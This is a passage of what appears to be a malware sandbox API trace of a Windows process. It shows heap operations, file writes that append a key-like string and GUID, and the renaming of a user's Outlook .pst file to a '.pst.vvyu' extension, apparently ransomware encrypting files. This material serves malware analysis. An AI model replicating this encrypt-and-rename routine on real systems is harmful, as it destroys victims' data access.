(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0188.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0188.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0188.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0188.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0188.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398e0 [0188.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0188.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0188.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39940 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39958 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398f8 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398c8 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0188.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0188.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0188.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0188.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0188.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0188.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0188.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0188.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0188.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0188.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0188.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0188.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0188.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0188.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0188.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0188.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0188.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0188.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0188.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0188.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38f88 | out: hHeap=0x6a0000) returned 1 [0188.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0188.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0188.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0188.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0188.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0188.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0188.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0188.935] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x25800, lpOverlapped=0x0) returned 1 [0188.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0188.938] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.938] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0188.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0188.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0188.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0188.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0188.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0188.950] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0188.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.950] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.950] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0188.950] CloseHandle (hObject=0x584) returned 1 [0188.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d43778 [0188.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.955] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst.vvyu")) returned 1 [0188.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0188.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.956] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0188.959] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 0 [0188.959] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0188.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0188.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0188.959] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0188.959] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0188.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0188.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0188.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0188.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0188.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 